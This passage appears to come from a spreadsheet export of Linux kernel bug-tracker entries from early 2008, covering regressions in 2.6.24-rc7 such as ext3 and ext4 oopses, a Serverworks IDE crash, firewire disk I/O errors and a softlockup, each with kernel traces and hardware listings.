    <t>2008-01-16 13:37 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: - Earliest failing kernel version: 2.6.24-rc7-gcdf71a10 Distribution: Gentoo Hardware Environment: Pentium III (Coppermine) Software Environment: Linux snakebyte-desktop 2.6.24-rc7-gcdf71a10 #29 PREEMPT Wed Jan 9 16:03:37 CET 2008 i686 GNU/Linux Gnu C 4.1.3 Gnu make 3.81 binutils 2.18 util-linux 2.13 mount 2.13 module-init-tools 3.3-pre2 e2fsprogs 1.40.2 reiserfsprogs 3.6.19 reiser4progs 1.0.6 xfsprogs 2.9.0 pcmciautils 014 PPP 2.4.4 Linux C Library 2.6.1 Dynamic linker (ldd) 2.6.1 Procps 3.2.7 Net-tools 1.60 Console-tools 0.2.3 Sh-utils 5.97 udev 113 Problem Description: I added fsx-linux from ltp and fsstress to the fsfuzzer tests, now during unmount i sometimes get the following oops: [ 4719.741202] BUG: unable to handle kernel paging request at virtual address fffffffa [ 4719.741261] printing eip: c013ece3 *pde = 0087f067 *pte = 00000000 [ 4719.741409] Oops: 0000 [#1] PREEMPT [ 4719.741524] Modules linked in: [ 4719.741563] [ 4719.741586] Pid: 12258, comm: umount Not tainted (2.6.24-rc7-g3ce54450 #28) [ 4719.741669] EIP: 0060:[&lt;c013ece3&gt;] EFLAGS: 00010046 CPU: 0 [ 4719.741718] EIP is at __lock_acquire+0x1d3/0x1050 [ 4719.741741] EAX: 00000002 EBX: 00000246 ECX: fffffff6 EDX: 00000002 [ 4719.741765] ESI: 00000000 EDI: 00000000 EBP: cca78da4 ESP: cca78d3c [ 4719.741848] DS: 007b ES: 007b FS: 0000 GS: 0033 SS: 0068 [ 4719.741872] Process umount (pid: 12258, ti=cca78000 task=cf208000 task.ti=cca78000) [ 4719.741896] Stack: cf43e0f0 c11e87c0 cf96bf00 cf43e000 cf96bf00 cf43e0f0 cca78d80 c016ce3f [ 4719.742248] 00000002 00000000 fffffff6 cf208000 cf208000 cca78d88 c013e453 00000000 [ 4719.742542] cf208000 c016eb25 00000287 cca78da8 c013e5f3 cf43e0f0 00000046 00000246 journal_force_commit+0xd/0x30 [ 4719.743648] [&lt;c01faaf5&gt;] ext3_force_commit+0x25/0x30 [ 4719.743704] [&lt;c01f4b7c&gt;] ext3_write_inode+0x2c/0x40 [ 4719.743805] [&lt;c018dfd6&gt;] __writeback_single_inode+0x266/0x330 [ 4719.743854] [&lt;c018e4b8&gt;] sync_sb_inodes+0x1c8/0x290 [ 4719.743955] [&lt;c018e5fa&gt;] sync_inodes_sb+0x7a/0x90 [ 4719.743997] [&lt;c0173711&gt;] __fsync_super+0x61/0x70 [ 4719.744113] [&lt;c017372b&gt;] fsync_super+0xb/0x20 [ 4719.744157] [&lt;c0173942&gt;] generic_shutdown_super+0x22/0xd0 [ 4719.744258] [&lt;c01739ff&gt;] kill_block_super+0xf/0x20 [ 4719.744300] [&lt;c0173ab7&gt;] deactivate_super+0x47/0x60 [ 4719.744401] [&lt;c0187914&gt;] mntput_no_expire+0x44/0x60 [ 4719.744457] [&lt;c0178c45&gt;] path_release_on_umount+0x15/0x20 [ 4719.744565] [&lt;c0187f01&gt;] sys_umount+0x41/0x210 [ 4719.744609] [&lt;c01880e7&gt;] sys_oldumount+0x17/0x20 [ 4719.744710] [&lt;c0104272&gt;] sysenter_past_esp+0x5f/0xa5 [ 4719.744754] ======================= [ 4719.744775] Code: d3 37 75 c0 e8 6f 09 fe ff c7 04 24 7c 5a 75 c0 e8 c3 8d 74 26 00 8b 4d c0 &lt;8b&gt; 71 04 85 f6 0f 84 78 fe ff ff ff 86 c0 00 00 00 89 f0 e8 05 [ 4719.746918] EIP: [&lt;c013ece3&gt;] __lock_acquire+0x1d3/0x1050 SS:ESP 0068:cca78d3c [ 4719.747041] ---[ end trace a415aae57fb6632a ]--- So far i was unable to reproduce this only with fsx or fstress on the corrupted filesystem, havent seen this on ext2 so far, will try with ext4</t>
  </si>
  <si>
    <t>Austin Lund</t>
  </si>
  <si>
    <t>psmouse.c: GlidePoint at isa0060/serio1/input0 lost sync at byte 1</t>
  </si>
  <si>
    <t>2008-01-10 16:45 UTC</t>
  </si>
  <si>
    <t>2014-09-19 17:17 UTC</t>
  </si>
  <si>
    <t>Vegard Nossum</t>
  </si>
  <si>
    <t>Subject : psmouse.c: GlidePoint at isa0060/serio1/input0 lost sync at byte 1 Submitter : "Vegard Nossum" &lt;vegard.nossum@gmail.com&gt; Date : 2007-11-14 References : http://lkml.org/lkml/2007/11/14/363 Caused by: commit dac4ae0daa1be36ab015973ed9e9dc04a2684395 Author: William Pettersson &lt;william.pettersson@gmail.com&gt; Date: Wed Sep 5 00:18:44 2007 -0400 Input: ALPS - add support for model found in Dell Vostro 1400 http://git.kernel.org/gitweb.cgi?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=dac4ae0daa1be36ab015973ed9e9dc04a2684395</t>
  </si>
  <si>
    <t>Serverworks initialisation fails</t>
  </si>
  <si>
    <t>2.6.24-rc7-g88fb61e4</t>
  </si>
  <si>
    <t>2008-01-10 17:59 UTC</t>
  </si>
  <si>
    <t>2008-01-11 12:31 UTC</t>
  </si>
  <si>
    <t>io_ide@kernel-bugs.osdl.org</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.24-rc7 Earliest failing kernel version: 2.6.24-rc7-g88fb61e4 Distribution: Fedora Core 7 Hardware Environment: Dell PowerEdge 2650 Software Environment: Problem Description: Oops when starting udev... Starting udev: BUG: unable to handle kernel paging request at virtual address 2d6d3a65 printing eip: c04e1af1 *pde = 00000000 Oops: 0000 [#1] PREEMPT SMP Modules linked in: evdev evbug rtc_cmos pcspkr floppy rtc_core rtc_lib shpchp pci_hotplug serverworks tg3 generic i2c_piix4 i2c_core Pid: 1820, comm: modprobe Not tainted (2.6.24-rc7-g88fb61e4 #2) EIP: 0060:[&lt;c04e1af1&gt;] EFLAGS: 00210286 CPU: 0 EIP is at strstr+0x11/0x34 EAX: 00000000 EBX: 2d6d3a65 ECX: ffffffff EDX: 2d6d3a65 ESI: c0513f75 EDI: 2d6d3a65 EBP: f65bccec ESP: f65bcce0 DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068 Process modprobe (pid: 1820, ti=f65bc000 task=f795a2f0 task.ti=f65bc000) Stack: f8921a44 00000001 00000000 f65bcd00 c054a0b9 f892e394 f892e080 f892e5f8 f65bcd20 f892133b c04d7c9d f892da80 f891d339 f892e394 f892e080 f892e5f8 f65bcd64 f891d11f f891d339 f891bc38 f892e080 00000000 00000001 00000000 Call Trace: [&lt;c0405170&gt;] show_trace_log_lvl+0x1a/0x2f [&lt;c0405222&gt;] show_stack_log_lvl+0x9d/0xa5 [&lt;c04052cd&gt;] show_registers+0xa3/0x1df [&lt;c040552a&gt;] die+0x121/0x204 [&lt;c05b40dd&gt;] do_page_fault+0x557/0x63e [&lt;c05b278a&gt;] error_code+0x72/0x78 [&lt;c054a0b9&gt;] dmi_check_system+0x2f/0x58 [&lt;f892133b&gt;] ide_acpi_init+0x28/0x195 [ide_core] [&lt;f891d11f&gt;] hwif_init+0x324/0x37c [ide_core] [&lt;f891d29a&gt;] ide_device_add+0x3b/0xa6 [ide_core] [&lt;f891ee9a&gt;] ide_setup_pci_device+0x36/0x40 [ide_core] [&lt;f885f11c&gt;] svwks_init_one+0x5b/0x62 [serverworks] [&lt;c04eada1&gt;] pci_device_probe+0x39/0x5b [&lt;c05369a8&gt;] driver_probe_device+0xe9/0x16a [&lt;c0536b43&gt;] __driver_attach+0x6c/0xa5 [&lt;c0535e92&gt;] bus_for_each_dev+0x36/0x5b [&lt;c05367f3&gt;] driver_attach+0x19/0x1b [&lt;c05361b1&gt;] bus_add_driver+0x73/0x1aa [&lt;c0536d29&gt;] driver_register+0x67/0x6c [&lt;c04eaef9&gt;] __pci_register_driver+0x56/0x83 [&lt;f890f017&gt;] svwks_ide_init+0x17/0x19 [serverworks] [&lt;c0447f1e&gt;] sys_init_module+0x15da/0x1715 [&lt;c04040b2&gt;] sysenter_past_esp+0x5f/0xa5 ======================= Code: e5 89 c1 89 c8 eb 06 80 38 00 74 07 40 4a 83 fa ff 75 f4 29 c8 5d c3 90 90 90 55 89 e5 57 56 53 89 c6 89 d3 31 c0 83 c9 ff 89 EIP: [&lt;c04e1af1&gt;] strstr+0x11/0x34 SS:ESP 0068:f65bcce0 ---[ end trace f0316f13333e9ff3 ]--- udevd-event[1819]: run_program: '/sbin/modprobe' abnormal exit Steps to reproduce: Just boot...</t>
  </si>
  <si>
    <t>oops in extent code via ext4_fallocate</t>
  </si>
  <si>
    <t>2.6.24-rc7</t>
  </si>
  <si>
    <t>2008-01-11 12:39 UTC</t>
  </si>
  <si>
    <t>2008-01-15 07:29 UTC</t>
  </si>
  <si>
    <t>fs_ext4@kernel-bugs.osdl.org</t>
  </si>
  <si>
    <t>Latest working kernel version: Unknown Earliest failing kernel version: 2.6.24-rc7 Distribution: Fedora Rawhide Hardware Environment: x86_64 Software Environment: Problem Description: a simple fallocate; truncate; fallocate series oopses the kernel. 2.6.24-rc7 with the latest ext4 patch stack as of about Jan 9, 2008, minus delalloc patches. Steps to reproduce, using the test program at http://oss.sgi.com/archives/xfs/2007-07/msg00092.html [root@bear-05 sdb8]# touch testfile [root@bear-05 sdb8]# ./testfallocate -f testfile 0 65536 Trying to preallocate blocks (offset=0, len=65536) fallocate system call succedded ! ret=0 # FALLOCATE TEST REPORT # New blocks preallocated = 16. Number of bytes preallocated = 65536 Old file size = 0, New file size 65536. Old num blocks = 0, New num blocks 64. ### TESTS PASSED ### [root@bear-05 sdb8]# ls -lh testfile; du -hc testfile -rw-r--r-- 1 root root 64K Jan 11 14:12 testfile 64K testfile 64K total [root@bear-05 sdb8]# /root/truncate testfile 32768 Truncating testfile to 32768 [root@bear-05 sdb8]# ls -lh testfile; du -hc testfile -rw-r--r-- 1 root root 32K Jan 11 14:12 testfile 32K testfile 32K total [root@bear-05 sdb8]# ./testfallocate -f testfile 0 65536 Trying to preallocate blocks (offset=0, len=65536) Segmentation fault and yields: EXT4-fs: file extents enabled EXT4-fs: mballoc enabled ------------[ cut here ]------------ kernel BUG at fs/ext4/extents.c:1056! invalid opcode: 0000 [1] SMP CPU 2 Modules linked in: ext4dev jbd2 crc16 autofs4 hidp nfs lockd nfs_acl rfcomm l2cap bluetooth sunrpc ipv6 cpufreq_ondemand dm_multipath video output sbs sbshc battery ac power_supply parport_pc lp parport sg pata_acpi cfi_cmdset_0002 ata_generic cfi_util button jedec_probe serio_raw cfi_probe tg3 gen_probe ck804xrom mtd rtc_cmos chipreg pata_amd map_funcs k8temp libata hwmon i2c_nforce2 shpchp i2c_core pcspkr dm_snapshot dm_zero dm_mirror dm_mod qla2xxx scsi_transport_fc scsi_tgt mptspi mptscsih mptbase scsi_transport_spi sd_mod scsi_mod ext3 jbd mbcache ehci_hcd ohci_hcd uhci_hcd Pid: 3554, comm: testfallocate Not tainted 2.6.24-0.147.rc7.git2.fc9 #1 RIP: 0010:[&lt;ffffffff88364497&gt;] [&lt;ffffffff88364497&gt;] :ext4dev:ext4_ext_search_left+0x97/0xbc RSP: 0018:ffff81012dc65cf0 EFLAGS: 00010287 RAX: 0000000000008008 RBX: ffff81012dc65d78 RCX: 0000000000000000 RDX: ffff81012dc65d90 RSI: ffff81012e5f37e0 RDI: ffff81012e04c00c RBP: ffff81012e04c180 R08: 0000000000000008 R09: 0000000000000000 R10: 0000000000000000 R11: ffff81012dc65d98 R12: 0000000000000008 R13: ffff81012e04c180 R14: 0000000000000008 R15: 0000000000000000 FS: 00002aaaaaab96f0(0000) GS:ffff81013fc01a28(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b CR2: 000000327d0414a0 CR3: 0000000130ce8000 CR4: 00000000000006a0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Process testfallocate (pid: 3554, threadinfo ffff81012dc64000, task ffff81012dd5a000) Stack: ffffffff88366073 ffff8101349e71d0 ffffffff81053c91 000000022dcc30b8 ffff81012dc65e88 0000000000000008 ffff81012e549000 ffff81012dcc30b8 ffff81012dcc3090 ffff81012e04c000 ffff81012dcc30b8 0000000000000008 Call Trace: [&lt;ffffffff88366073&gt;] :ext4dev:ext4_ext_get_blocks+0x5ba/0x8c1 [&lt;ffffffff81053c91&gt;] lock_release_holdtime+0x27/0x49 [&lt;ffffffff812748f6&gt;] _spin_unlock+0x17/0x20 [&lt;ffffffff883400a6&gt;] :jbd2:start_this_handle+0x4e0/0x4fe [&lt;ffffffff88366564&gt;] :ext4dev:ext4_fallocate+0x175/0x39a [&lt;ffffffff81053c91&gt;] lock_release_holdtime+0x27/0x49 [&lt;ffffffff81056480&gt;] __lock_acquire+0x4e7/0xc4d [&lt;ffffffff81053c91&gt;] lock_release_holdtime+0x27/0x49 [&lt;ffffffff810a8de7&gt;] sys_fallocate+0xe4/0x10d [&lt;ffffffff8100c043&gt;] tracesys+0xd5/0xda Code: 0f 0b eb fe ff c8 89 02 0f b7 47 06 8b 4f 08 0f b7 57 04 48 RIP [&lt;ffffffff88364497&gt;] :ext4dev:ext4_ext_search_left+0x97/0xbc RSP &lt;ffff81012dc65cf0&gt; ---[ end trace 9a60a6a6c694770a ]--- SysRq : Resetting The BUG_ON is: BUG_ON(*logical &lt; le32_to_cpu(ex-&gt;ee_block) + le16_to_cpu(ex-&gt;ee_len)); where these were the values: logical 8 ee_block 0 ee_len 32776 Haven't looked further into it yet.</t>
  </si>
  <si>
    <t>I/O error when plugging/unplugging a second firewire disk</t>
  </si>
  <si>
    <t>2.6.22...2.6.24</t>
  </si>
  <si>
    <t>2008-01-12 07:47 UTC</t>
  </si>
  <si>
    <t>sbu</t>
  </si>
  <si>
    <t>2008-03-19 11:00 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.18-5 (can't test any other kernel between 2.6.18-5 and 2.6.22-3 because aren't in the repo) Earliest failing kernel version: 2.6.22-3 Distribution: debian lenny 32bit AND 64 bit (it happens the same on both) Hardware Environment: ibm x3400 quad core 2GB ram type/number 7976-KBG bios version 1.56 http://www-03.ibm.com/systems/x/tower/x3400/specs.html cpu info: -&gt; http://www.pastebin.org/15078 lspci firewire: -&gt; http://www.pastebin.org/15081 lsmod: -&gt; http://www.pastebin.org/15083 Software Environment: bash Problem Description: We have a 64bit pci double firewire 800 port to which I attach 2 sata hdd (it doesn't matter the brand of the hdd. We tried many) Everything works well until we use only one disk. Connecting a second disk when we are working on the first one (i.e. writing to the first device) causes the interruption of the first job. once happened also a kernel freeze but we can't document and reproduce it right now. Steps to reproduce: We attach a sata disk to the first port of the pci firewire B controller 08:02.0 FireWire (IEEE 1394): Texas Instruments TSB82AA2 IEEE-1394b Link Layer Controller (rev 01) Jan 12 16:19:13 x3400 kernel: ieee1394: Error parsing configrom for node 1-00:1023 Jan 12 16:19:13 x3400 kernel: ieee1394: Node changed: 1-00:1023 -&gt; 1-01:1023 Jan 12 16:19:14 x3400 kernel: ieee1394: Node resumed: ID:BUS[1-00:1023] GUID[0030e002e0454697] Jan 12 16:19:14 x3400 kernel: scsi9 : SBP-2 IEEE-1394 Jan 12 16:19:15 x3400 kernel: ieee1394: sbp2: Logged into SBP-2 device Jan 12 16:19:15 x3400 kernel: ieee1394: Node 1-00:1023: Max speed [S800] - Max payload [4096] Jan 12 16:19:15 x3400 kernel: Vendor: WDC WD16 Model: 00JD-00HBC0 Rev: 08.0 Jan 12 16:19:15 x3400 kernel: Type: Direct-Access-RBC ANSI SCSI revision: 04 Jan 12 16:19:15 x3400 kernel: SCSI device sdc: 312579695 512-byte hdwr sectors (160041 MB) Jan 12 16:19:15 x3400 kernel: sdc: Write Protect is off Jan 12 16:19:15 x3400 kernel: sdc: Mode Sense: 11 00 00 00 Jan 12 16:19:15 x3400 kernel: SCSI device sdc: drive cache: write back Jan 12 16:19:15 x3400 kernel: SCSI device sdc: 312579695 512-byte hdwr sectors (160041 MB) Jan 12 16:19:15 x3400 kernel: sdc: Write Protect is off Jan 12 16:19:15 x3400 kernel: sdc: Mode Sense: 11 00 00 00 Jan 12 16:19:15 x3400 kernel: SCSI device sdc: drive cache: write back Jan 12 16:19:15 x3400 kernel: sdc: unknown partition table Jan 12 16:19:15 x3400 kernel: sd 9:0:0:0: Attached scsi disk sdc now we launch : dd if=/dev/zero of=/dev/sdc everything ok until now now we attach another sata disc to the second port of the pci firewire controller: Jan 12 16:20:09 x3400 kernel: ieee1394: Error parsing configrom for node 1-00:1023 Jan 12 16:20:09 x3400 kernel: ieee1394: Node changed: 1-00:1023 -&gt; 1-01:1023 Jan 12 16:20:09 x3400 kernel: ieee1394: Node changed: 1-01:1023 -&gt; 1-02:1023 Jan 12 16:20:10 x3400 kernel: ieee1394: Reconnected to SBP-2 device Jan 12 16:20:10 x3400 kernel: ieee1394: Node 1-01:1023: Max speed [S800] - Max payload [4096] using 2.6.18-5-686 everything works well dd still works now we disconnect the disk from the second port Jan 12 16:21:13 x3400 kernel: ieee1394: Node changed: 1-01:1023 -&gt; 1-00:1023 Jan 12 16:21:13 x3400 kernel: ieee1394: Node changed: 1-02:1023 -&gt; 1-01:1023 Jan 12 16:21:13 x3400 kernel: ieee1394: Reconnected to SBP-2 device Jan 12 16:21:13 x3400 kernel: ieee1394: Node 1-00:1023: Max speed [S800] - Max payload [4096] everything ok also disconnecting the second device ------------------------------------------------------- now the same issue using 2.6.24-rc7-686: we attach a sata disk to the first port of the pci firewire B controller Jan 12 16:49:45 x3400 kernel: firewire_core: phy config: card 1, new root=ffc1, gap_count=5 Jan 12 16:49:46 x3400 kernel: scsi11 : SBP-2 IEEE-1394 Jan 12 16:49:46 x3400 kernel: firewire_core: created new fw device fw2 (2 config rom retries, S800) Jan 12 16:49:46 x3400 kernel: firewire_sbp2: logged in to fw2.0 LUN 0000 (0 retries) Jan 12 16:49:46 x3400 kernel: scsi 11:0:0:0: Direct-Access-RBC WDC WD16 00JD-00HBC0 08.0 PQ: 0 ANSI: 4 Jan 12 16:49:46 x3400 kernel: sd 11:0:0:0: [sdc] 312579695 512-byte hardware sectors (160041 MB) Jan 12 16:49:46 x3400 kernel: sd 11:0:0:0: [sdc] Write Protect is off Jan 12 16:49:46 x3400 kernel: sd 11:0:0:0: [sdc] Mode Sense: 11 00 00 00 Jan 12 16:49:46 x3400 kernel: sd 11:0:0:0: [sdc] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA Jan 12 16:49:46 x3400 kernel: sd 11:0:0:0: [sdc] 312579695 512-byte hardware sectors (160041 MB) Jan 12 16:49:46 x3400 kernel: sd 11:0:0:0: [sdc] Write Protect is off Jan 12 16:49:46 x3400 kernel: sd 11:0:0:0: [sdc] Mode Sense: 11 00 00 00 Jan 12 16:49:46 x3400 kernel: sd 11:0:0:0: [sdc] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA Jan 12 16:49:46 x3400 kernel: sdc: unknown partition table Jan 12 16:49:46 x3400 kernel: sd 11:0:0:0: [sdc] Attached SCSI disk now we launch : dd if=/dev/zero of=/dev/sdc now we attach another sata disk to the second port of the pci firewire B controller: Jan 12 16:50:49 x3400 kernel: firewire_sbp2: orb reply timed out, rcode=0x11 Jan 12 16:50:49 x3400 kernel: sd 11:0:0:0: [sdc] Result: hostbyte=DID_BUS_BUSY driverbyte=DRIVER_OK,SUGGEST_OK Jan 12 16:50:49 x3400 kernel: end_request: I/O error, dev sdc, sector 2942302 Jan 12 16:50:49 x3400 kernel: printk: 571588 messages suppressed. Jan 12 16:50:49 x3400 kernel: Buffer I/O error on device sdc, logical block 2942302 Jan 12 16:50:49 x3400 kernel: lost page write due to I/O error on sdc Jan 12 16:50:49 x3400 kernel: Buffer I/O error on device sdc, logical block 2942303 Jan 12 16:50:49 x3400 kernel: lost page write due to I/O error on sdc Jan 12 16:50:49 x3400 kernel: Buffer I/O error on device sdc, logical block 2942304 Jan 12 16:50:49 x3400 kernel: lost page write due to I/O error on sdc Jan 12 16:50:49 x3400 kernel: Buffer I/O error on device sdc, logical block 2942305 Jan 12 16:50:49 x3400 kernel: lost page write due to I/O error on sdc Jan 12 16:50:49 x3400 kernel: Buffer I/O error on device sdc, logical block 2942306 Jan 12 16:50:49 x3400 kernel: lost page write due to I/O error on sdc Jan 12 16:50:49 x3400 kernel: Buffer I/O error on device sdc, logical block 2942307 Jan 12 16:50:49 x3400 kernel: lost page write due to I/O error on sdc Jan 12 16:50:49 x3400 kernel: Buffer I/O error on device sdc, logical block 2942308 Jan 12 16:50:49 x3400 kernel: lost page write due to I/O error on sdc Jan 12 16:50:49 x3400 kernel: Buffer I/O error on device sdc, logical block 2942309 Jan 12 16:50:49 x3400 kernel: lost page write due to I/O error on sdc Jan 12 16:50:49 x3400 kernel: Buffer I/O error on device sdc, logical block 2942310 Jan 12 16:50:49 x3400 kernel: lost page write due to I/O error on sdc Jan 12 16:50:49 x3400 kernel: Buffer I/O error on device sdc, logical block 2942311 Jan 12 16:50:49 x3400 kernel: lost page write due to I/O error on sdc Jan 12 16:50:49 x3400 kernel: sd 11:0:0:0: [sdc] Result: hostbyte=DID_BUS_BUSY driverbyte=DRIVER_OK,SUGGEST_OK Jan 12 16:50:49 x3400 kernel: end_request: I/O error, dev sdc, sector 2942557 Jan 12 16:50:49 x3400 kernel: sd 11:0:0:0: [sdc] Result: hostbyte=DID_BUS_BUSY driverbyte=DRIVER_OK,SUGGEST_OK Jan 12 16:50:49 x3400 kernel: end_request: I/O error, dev sdc, sector 2942812 Jan 12 16:50:49 x3400 kernel: sd 11:0:0:0: [sdc] Result: hostbyte=DID_BUS_BUSY driverbyte=DRIVER_OK,SUGGEST_OK Jan 12 16:50:49 x3400 kernel: end_request: I/O error, dev sdc, sector 2943067 Jan 12 16:50:49 x3400 kernel: sd 11:0:0:0: [sdc] Result: hostbyte=DID_BUS_BUSY driverbyte=DRIVER_OK,SUGGEST_OK Jan 12 16:50:49 x3400 kernel: end_request: I/O error, dev sdc, sector 2943322 Jan 12 16:50:49 x3400 kernel: sd 11:0:0:0: [sdc] Result: hostbyte=DID_BUS_BUSY driverbyte=DRIVER_OK,SUGGEST_OK Jan 12 16:50:49 x3400 kernel: end_request: I/O error, dev sdc, sector 2943577 Jan 12 16:50:49 x3400 kernel: sd 11:0:0:0: [sdc] Result: hostbyte=DID_BUS_BUSY driverbyte=DRIVER_OK,SUGGEST_OK Jan 12 16:50:49 x3400 kernel: end_request: I/O error, dev sdc, sector 2943832 Jan 12 16:50:49 x3400 kernel: sd 11:0:0:0: [sdc] Result: hostbyte=DID_BUS_BUSY driverbyte=DRIVER_OK,SUGGEST_OK Jan 12 16:50:49 x3400 kernel: end_request: I/O error, dev sdc, sector 2944087 Jan 12 16:50:49 x3400 kernel: sd 11:0:0:0: [sdc] Result: hostbyte=DID_BUS_BUSY driverbyte=DRIVER_OK,SUGGEST_OK Jan 12 16:50:49 x3400 kernel: end_request: I/O error, dev sdc, sector 2944342 Jan 12 16:50:49 x3400 kernel: sd 11:0:0:0: [sdc] Result: hostbyte=DID_BUS_BUSY driverbyte=DRIVER_OK,SUGGEST_OK Jan 12 16:50:49 x3400 kernel: end_request: I/O error, dev sdc, sector 2944597 it goes on this way until when we kill the dd thanks in advance damko &amp; divilinux</t>
  </si>
  <si>
    <t>regression: 100% io-wait with 2.6.24-rcX</t>
  </si>
  <si>
    <t>2008-01-12 12:19 UTC</t>
  </si>
  <si>
    <t>2008-01-15 12:35 UTC</t>
  </si>
  <si>
    <t>Subject : regression: 100% io-wait with 2.6.24-rcX Submitter : Joerg Platte &lt;lists@naasa.net&gt; Date : 2008-01-07 11:51 References : http://lkml.org/lkml/2008/1/7/70 Handled-By : Fengguang Wu &lt;wfg@mail.ustc.edu.cn&gt;</t>
  </si>
  <si>
    <t>[PATCH] Fix 2.6.24-rc7 regression in asix.c</t>
  </si>
  <si>
    <t>2008-01-12 12:27 UTC</t>
  </si>
  <si>
    <t>2008-01-13 11:13 UTC</t>
  </si>
  <si>
    <t>Subject : [PATCH] Fix 2.6.24-rc7 regression in asix.c Submitter : Russ Dill &lt;russ.dill@gmail.com&gt; Date : 2008-01-08 15:17 References : http://lkml.org/lkml/2008/1/8/435 Handled-By : Russ Dill &lt;russ.dill@gmail.com&gt; Patch : http://lkml.org/lkml/2008/1/8/435</t>
  </si>
  <si>
    <t>probably softlockup</t>
  </si>
  <si>
    <t>2008-01-14 10:15 UTC</t>
  </si>
  <si>
    <t>2008-04-10 13:23 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: unknown Earliest failing kernel version: i catch exact message at 2.6.24-rc7, but server was "freezing" similar way from 2.6.22 Distribution: Gentoo Hardware Environment: Described in text Software Environment: iproute2 shaping, source routing, vlan, rtorrent Problem Description: It is very difficult to reproduce bug, and also difficult to catch screen, cause server installed in rack in another country, and local staff had under hands only phone camera, and new messages was appearing non-stop on screen, so i had some hell time to decode all this. This bug appearing after 2-3 days since 2.6.20 (at this kernel version server was just installed), and i am not able to reproduce it. Just not i was able to catch messages on screen and debug was enabled. Very strange thing, but none of watchdogs able to catch this bug. I was running /bin/busybox watchdog -t 10 /dev/watchdog with iTCO_wdt module dmesg shows that it must work iTCO_wdt: Intel TCO WatchDog Timer Driver v1.02 (26-Jul-2007) iTCO_wdt: Found a 631xESB/632xESB TCO device (Version=2, TCOBASE=0x0860) iTCO_wdt: initialized. heartbeat=30 sec (nowayout=0) and some custom perl script to ping remote host and issue reboot command in case of ping failed. Probably there is some mistake at numbers, very bad resolution: c can be e, i mark this places as "?", and probably some 0 can be 8 i will mark difficult to read places as "#" What i am able to read from screen: EIP: 0060:[&lt;c010edb8&gt;] EFLAGS: 00200202 CPU:2 EIP is at native_flush_tlb_others+0x69/0x95 EAX: ffffb300 EBX: f657cb40 ECX: c040?bc0 EDX: 000###fd ESI: ffffffff EDI: f73f6898 EBP: f77a3f30 DS: 007b ES: 007b FS:00d8 GS: 0033 SS: 0068 CR0: 80050033 CR2: b766?000 CR3: 1d661000 CR4: 000006d0 DR0: 00000000 DR2: 00000000 DR3: 00000000 DR4: 00000000 DR6: ffff0ff0 DR7: 00000400 [&lt;c0105e68&gt;] show_trace_log_lvl+0x1a/0x2f [&lt;c0106810&gt;] show_trace+0x12/0x14 [&lt;c010341f&gt;] show_regs+0x1c/0x1f [&lt;c0141883&gt;] softlockup_tick+0x103/0x11c [&lt;c012448a&gt;] run_local_timers+0x12/0x14 [&lt;c0124833&gt;] update_process_times+0x24/0x49 [&lt;c013563d&gt;] tick_sched_timer+0x7e/0xc2 [&lt;c01305cf&gt;] hrtimer_interrupt+0x10d/0x197 [&lt;c010feff&gt;] smp_apic_timer_interrupt+0x72/0x84 [&lt;c010594b&gt;] apic_timer_interrupt+0x33/0x38 [&lt;c010f389&gt;] flush_tlb_mm+0x55/0x59 [&lt;c0152623&gt;] unmap_region+0xdd/0x101 [&lt;c0152fcd&gt;] do_munmap+0x153/0x1b4 [&lt;c015305?&gt;] sys_munmap+0x30/0x3f There is looks like another backtrace, but it is even more difficult to decode it. Photos of screen links http://www.nuclearcat.com/files/panic2/DSC00096.JPG http://www.nuclearcat.com/files/panic2/DSC00097.JPG http://www.nuclearcat.com/files/panic2/DSC00098.JPG http://www.nuclearcat.com/files/panic2/DSC00099.JPG http://www.nuclearcat.com/files/panic2/DSC00100.JPG http://www.nuclearcat.com/files/panic2/DSC00102.JPG http://www.nuclearcat.com/files/panic2/DSC00103.JPG http://www.nuclearcat.com/files/panic2/DSC00104.JPG Hardware is Dell PowerEdge 1950 lspci 00:00.0 Host bridge: Intel Corporation 5000X Chipset Memory Controller Hub (rev 12) 00:02.0 PCI bridge: Intel Corporation 5000 Series Chipset PCI Express x4 Port 2 (rev 12) 00:03.0 PCI bridge: Intel Corporation 5000 Series Chipset PCI Express x4 Port 3 (rev 12) 00:04.0 PCI bridge: Intel Corporation 5000 Series Chipset PCI Express x4 Port 4 (rev 12) 00:05.0 PCI bridge: Intel Corporation 5000 Series Chipset PCI Express x4 Port 5 (rev 12) 00:06.0 PCI bridge: Intel Corporation 5000 Series Chipset PCI Express x8 Port 6-7 (rev 12) 00:07.0 PCI bridge: Intel Corporation 5000 Series Chipset PCI Express x4 Port 7 (rev 12) 00:10.0 Host bridge: Intel Corporation 5000 Series Chipset FSB Registers (rev 12) 00:10.1 Host bridge: Intel Corporation 5000 Series Chipset FSB Registers (rev 12) 00:10.2 Host bridge: Intel Corporation 5000 Series Chipset FSB Registers (rev 12) 00:11.0 Host bridge: Intel Corporation 5000 Series Chipset Reserved Registers (rev 12) 00:13.0 Host bridge: Intel Corporation 5000 Series Chipset Reserved Registers (rev 12) 00:15.0 Host bridge: Intel Corporation 5000 Series Chipset FBD Registers (rev 12) 00:16.0 Host bridge: Intel Corporation 5000 Series Chipset FBD Registers (rev 12) 00:1c.0 PCI bridge: Intel Corporation 631xESB/632xESB/3100 Chipset PCI Express Root Port 1 (rev 09) 00:1d.0 USB Controller: Intel Corporation 631xESB/632xESB/3100 Chipset UHCI USB Controller #1 (rev 09) 00:1d.1 USB Controller: Intel Corporation 631xESB/632xESB/3100 Chipset UHCI USB Controller #2 (rev 09) 00:1d.2 USB Controller: Intel Corporation 631xESB/632xESB/3100 Chipset UHCI USB Controller #3 (rev 09) 00:1d.7 USB Controller: Intel Corporation 631xESB/632xESB/3100 Chipset EHCI USB2 Controller (rev 09) 00:1e.0 PCI bridge: Intel Corporation 82801 PCI Bridge (rev d9) 00:1f.0 ISA bridge: Intel Corporation 631xESB/632xESB/3100 Chipset LPC Interface Controller (rev 09) 00:1f.1 IDE interface: Intel Corporation 631xESB/632xESB 